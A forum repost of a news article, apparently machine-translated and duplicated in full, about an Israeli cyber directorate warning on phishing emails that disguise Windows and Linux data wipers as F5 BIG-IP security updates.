Brother
Professional
- Messages
- 2,590
- Reaction score
- 539
- Points
- 113
Hacktivists have opened a new front in the fight against Israel.
Israel's National Cybersecurity Authority warns of phishing attacks disguised as security updates for F5 Networks ' BIG-IP devices. During the attacks, vipers for Windows and Linux are distributed.
Israel's National Cyber Directorate (INCD) acts as a CERT responsible for protecting the country from cyber threats and warning organizations and citizens about known attacks.
Since October, Israel has been subject to large-scale cyber attacks by hackers supporting Palestine and Iran, who carry out the theft and destruction of data from Israeli organizations. In November, a new viper called BiBi Wiper was discovered, targeting both Linux and Windows devices, and erasing data on target devices. The creation of the program is attributed to hacktivists who support Hamas.
INCD warned about a new phishing attack, during which data cleaning tools were sent by email under the guise of a warning about the presence of a zero-day vulnerability in F5 BIG-IP devices. The pro-Palestinian hacktivist group Handala claimed responsibility for the attack, claiming that members of the group had penetrated many Israeli networks. However, experts were unable to confirm the group's statements.
Phishing emails warn about the active use of the F5 BIG-IP vulnerability in attacks and encourage Israeli organizations to download and install a security update. For Windows users, emails offer a file called F5UPDATER.exe, and for Linux — a script called update.sh.
Viper on Windows pretends to be an F5 security update
Both versions of Viper attempt to mimic the F5 security update by displaying the company's logo. After clicking the "Update" button, the program sends data about the device to the Telegram channel and tries to erase all data on the computer. However, according to BleepingComputer, the program works with errors and does not delete all data.
The Linux version is a script that first loads the necessary programs for data cleaning, such as xfsprogs, wipe, and parted. Programs first delete all users in the system, then use the "wipe" command to delete their associated directories. The program then attempts to delete all system files and partitions on the Linux device. When finished, the computer restarts to allow the partition changes to take effect. Like the Windows version, the Linux version also transmits device information and status updates to the Telegram channel.
Vipers have become a serious problem for Israel, as hacktivists often use them in destructive attacks aimed at disrupting the country's operations and economy. As always, the best protection is to download files from email only if they come from a verified and verified source. In addition, you should only download security updates directly from the hardware manufacturer, and not from third-party sites.
Israel's National Cybersecurity Authority warns of phishing attacks disguised as security updates for F5 Networks ' BIG-IP devices. During the attacks, vipers for Windows and Linux are distributed.
Israel's National Cyber Directorate (INCD) acts as a CERT responsible for protecting the country from cyber threats and warning organizations and citizens about known attacks.
Since October, Israel has been subject to large-scale cyber attacks by hackers supporting Palestine and Iran, who carry out the theft and destruction of data from Israeli organizations. In November, a new viper called BiBi Wiper was discovered, targeting both Linux and Windows devices, and erasing data on target devices. The creation of the program is attributed to hacktivists who support Hamas.
INCD warned about a new phishing attack, during which data cleaning tools were sent by email under the guise of a warning about the presence of a zero-day vulnerability in F5 BIG-IP devices. The pro-Palestinian hacktivist group Handala claimed responsibility for the attack, claiming that members of the group had penetrated many Israeli networks. However, experts were unable to confirm the group's statements.
Phishing emails warn about the active use of the F5 BIG-IP vulnerability in attacks and encourage Israeli organizations to download and install a security update. For Windows users, emails offer a file called F5UPDATER.exe, and for Linux — a script called update.sh.
Viper on Windows pretends to be an F5 security update
Both versions of Viper attempt to mimic the F5 security update by displaying the company's logo. After clicking the "Update" button, the program sends data about the device to the Telegram channel and tries to erase all data on the computer. However, according to BleepingComputer, the program works with errors and does not delete all data.
The Linux version is a script that first loads the necessary programs for data cleaning, such as xfsprogs, wipe, and parted. Programs first delete all users in the system, then use the "wipe" command to delete their associated directories. The program then attempts to delete all system files and partitions on the Linux device. When finished, the computer restarts to allow the partition changes to take effect. Like the Windows version, the Linux version also transmits device information and status updates to the Telegram channel.
Vipers have become a serious problem for Israel, as hacktivists often use them in destructive attacks aimed at disrupting the country's operations and economy. As always, the best protection is to download files from email only if they come from a verified and verified source. In addition, you should only download security updates directly from the hardware manufacturer, and not from third-party sites.
